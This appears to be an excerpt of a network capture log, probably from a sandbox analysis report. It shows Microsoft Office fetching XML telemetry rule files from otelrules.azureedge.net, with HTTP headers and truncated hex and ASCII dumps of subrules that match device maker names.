2024-11-07 06:33:04 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:04 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 891841ce-c01e-0014-6d8e-2da6a3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063304Z-15869dbbcc68l9dbhC1DFWr9fg00000001cg0000000028h1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:04 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063304Z-16547b76f7f775p5hC1DFWzdvn00000007s0000000008gyu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:04 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063304Z-16547b76f7fx6rhxhC1DFW76kg00000007v00000000010pt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:04 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063304Z-15869dbbcc6lq2lzhC1DFWym6c00000002ug00000000csg4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:04 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:04 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 38f7eb3e-301e-006e-6008-2cf018000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063304Z-16547b76f7fnm7lfhC1DFWkxt400000007sg000000001kga x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:04 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:05 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:05 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063305Z-16547b76f7fsjlq8hC1DFWehq000000007e000000000mny8 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:05 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:05 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:05 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: 2e6eb393-601e-0097-4b00-2df33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063305Z-16547b76f7f22sh5hC1DFWyb4w00000007sg000000001pat x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:05 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:05 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:05 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 504dc720-801e-00a0-642f-2f2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063305Z-15869dbbcc6khw88hC1DFWbb20000000018000000000ez40 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:05 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49777	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:05 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:05 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 9e5bc133-001e-0065-6500-2f0b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063305Z-17df447cdb5t94hvhC1DFWw978000000048g000000000qqm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:05 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49778	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:05 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:05 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063305Z-16547b76f7fcrtpchC1DFW52e800000007s000000000e713 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-07 06:33:05 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49779	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:06 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 06:33:06 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 06:33:06 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 7b7195f4-601e-0050-1f60-2e2c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T063306Z-15869dbbcc68l9dbhC1DFWr9fg00000001cg0000000028m8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 06:33:06 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.4	49780	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 06:33:06 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
